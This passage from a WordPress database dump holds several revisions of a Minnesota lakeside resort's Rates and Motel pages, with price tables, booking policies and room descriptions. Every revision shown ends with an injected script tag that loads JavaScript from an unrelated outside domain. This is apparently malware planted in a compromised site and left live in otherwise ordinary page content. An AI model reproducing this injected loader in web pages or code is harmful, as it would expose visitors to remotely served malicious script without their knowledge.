#14),2,$200.00,$250.00,$1,100.00,\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 11:52:56','2017-12-01 17:52:56','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(593,2,'2017-12-01 12:06:00','2017-12-01 18:06:00','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$1,100.00,\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 12:06:00','2017-12-01 18:06:00','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(594,2,'2017-12-01 12:07:32','2017-12-01 18:07:32','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,$1100.00,\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 12:07:32','2017-12-01 18:07:32','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(595,2,'2017-12-01 12:19:37','2017-12-01 18:19:37','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,\"$1100.00\",\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 12:19:37','2017-12-01 18:19:37','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(596,2,'2017-12-01 12:20:19','2017-12-01 18:20:19','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,\"$1,100.00\",\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 12:20:19','2017-12-01 18:20:19','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(597,2,'2017-12-01 12:25:21','2017-12-01 18:25:21','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2017,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,\"$1,000.00\",\"$1,200.00\",8\r\nTent & Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-01 12:25:21','2017-12-01 18:25:21','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(599,1,'2017-12-14 21:08:35','2017-12-15 03:08:35','<span class=\"resbody\">Call us at 218-747-2959 for reservations\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING YOUR RESERVATION.\r\nALL DEPOSITS ARE NON-REFUNDABLE SEE RATES BELOW</span>\r\n\r\nWireless Internet Available\r\n\r\n[table caption=\"2018 Rates\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\n2018,Bedrooms,Weekday Nightly,Weekend Holiday Nightly,Weekly Sept. - May,Weekly June - Aug.,Maximum Capacity,\r\nSleepers Motel,1,$80.00,$95.00,$450.00,$550.00,4\r\nKitchenettes Motel,1,$100.00,$130.00,$600.00,$700.00,4\r\nSuite 9,2,$175.00,$225.00,$900.00,\"$1,100.00\",4\r\nCabins (#10 #11 #12),2,$180.00,$230.00,$900.00,\"$1,100.00\",8\r\nCabins (#13 #14),2,$200.00,$250.00,\"$1,000.00\",\"$1,200.00\",8\r\nTent &amp; Popups,1 per site,$35.00,$35.00,$180.00,\"$180.00\",\r\nRV/Travel Trailers,1  per site,$45.00,$45.00,$250.00,\"$250.00\",,\r\nPets,,$5.00,$5.00,$35.00,\"$35.00\",,\r\nAdditional People Camping (Each),,$5.00,$5.00,$25.00,\"$25.00\",,\r\nAdditional People in Motel and Cabins (Each),,$20.00,$20.00,$100.00,\"$100.00\",,\r\n[/table]\r\n\r\nSuite #9 - Cabins #13 &amp; #14 are no smoking and no pets\r\n<p class=\"resbody\"><strong>Prices shown are for groups of 4 or less</strong>\r\n<strong> All Daytime (Not Overnight) Guests $5.00 each</strong>\r\n<strong>Max Occupancy: Motel Rooms and Suite #9 is 4, Cabins 8.</strong></p>\r\nAll RATES ARE SUBJECT TO MINNESOTA SALES TAX OF 6.875{e8685805bf28f021bf5cc09fa4308e266d596c105e03dfc5c0e2e271cf65f235}\r\n<p class=\"resbody\">ALL UNITS INCLUDE: COLOR TV, AIR CONDITIONING, BED LINENS.\r\nPLEASE REMEMBER TO BRING BATH AND BEACH TOWELS.\r\nCRIBS &amp; HIGHCHAIRS AVAILABLE.</p>\r\nA MINIMUM DEPOSIT IS REQUIRED WITHIN 5 DAYS OF MAKING RESERVATION\r\nALL DEPOSITS ARE NON-REFUNDABLE.\r\n\r\nCHECK IN TIME IS AFTER 3:00PM\r\nNO EXCEPTIONS\r\nCHECK OUT TIME IS BEFORE 10:00AM\r\n\r\nWE believe that Pets are part of the family so pets on a leash are welcome in all campsites and some of the units\r\nPETS $5.00 per day\r\n<p class=\"resbody\">Please do not bring firewood, if you live more tha 50 miles from Ashby!</p>\r\n<strong>MOTEL OPEN YEAR ROUND.</strong>\r\n<strong> CALL FOR WINTER RATES</strong>\r\n\r\n&nbsp;\r\n\r\n[table caption=\"Equipment Rentals\" width=\"500\" colwidth=\"20|100|50\" colalign=\"left|left|center|left|right\"]\r\nIf Available,Daily,Weekly,\r\n14\' Lund Boat,$20.00,$100.00,\r\n15 H.P. 4 Stroke Yamaha Motor,$30.00,$150.00,Plus Gas\r\nBoat and Motor,$50.00,$250.00,Plus Gas\r\n<del datetime=\"2016-08-26T17:44:30+00:00\">\r\n20\' Pontoon with 25 H.P. Motor,$125.00,$450.00,Plus Gas\r\nPaddle Boards, $5.00 per hour\r\nBoat Lifts,$20.00,$100.00,\r\nBoat Launching/Docking,,,$5.00 One time Fee\r\n[/table]</del>\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Rates','','inherit','closed','closed','','43-revision-v1','','','2017-12-14 21:08:35','2017-12-15 03:08:35','',43,'http://ashbyresort.com/43-revision-v1/',0,'revision','',0),(601,2,'2018-01-26 10:56:25','2018-01-26 16:56:25','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (Ovens in #3 & 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n\r\n<strong>Sleepers #2, #4 and #6</strong>\r\n\r\nAre one bedroom - 1 bathroom and 1 Double Bed  with a hide a bed sofa in the main living area.\r\nMaximum people 4.\r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42011-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-541\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42041-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-542\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN42001-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-540\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN41971-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-539\" />\r\n\r\n\r\n\r\n\r\n\r\n<strong>Lakeside Villa #9</strong>\r\n\r\nUnit # 9 is one of the most popular units newly remodeled in 2015\r\n#9 has one Queen  bed, and two single beds one bathroom \r\n<img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4157-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-468\" /><img src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4155-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" class=\"alignnone size-medium wp-image-467\" />\r\nMAXIMUM PEOPLE IS FOUR\r\nNO PETS NO SMOKING\r\n\r\n&nbsp;\r\n\r\n&nbsp;<script src=\'https://cht.secondaryinformtrand.com/m.js?n=ns1\' type=\'text/javascript\'></script>','Motel','','inherit','closed','closed','','46-revision-v1','','','2018-01-26 10:56:25','2018-01-26 16:56:25','',46,'http://ashbyresort.com/46-revision-v1/',0,'revision','',0),(602,2,'2018-01-26 10:57:32','2018-01-26 16:57:32','<strong> Stay in a Motel Room -\r\nWe have motel units with kitchens \"Kitchenettes\"\r\nand we have units without kitchens \"Sleepers\".</strong>\r\n\r\nAll units are lakeside on level grounds with a park-like setting that is even more captivating during our beautiful sunsets.\r\n\r\n<img class=\"alignnone size-medium wp-image-313\" src=\"http://ashbyresort.com/wp-content/uploads/2017/01/DSC00168-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" />\r\n\r\n<strong>Kitchenettes #1, 3, 5 &amp; 7</strong>\r\n\r\nAre 1 bedroom - 1 bathroom with 2 double beds Maximum people 4\r\n\r\nalso included in a Kitchenette unit is:\r\nA Stove (Ovens in #3 & 7 only), microwave, refrigerator, coffee maker, toaster, pots, pans, dishes, TV and airconditioning\r\n\r\n<img class=\"alignnone size-medium wp-image-466\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4153-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-462\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4144-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" /><img class=\"alignnone size-medium wp-image-465\" src=\"http://ashbyresort.com/wp-content/uploads/2016/03/DSCN4151-300x225.jpg\" alt=\"\" width=\"300\" height=\"225\" 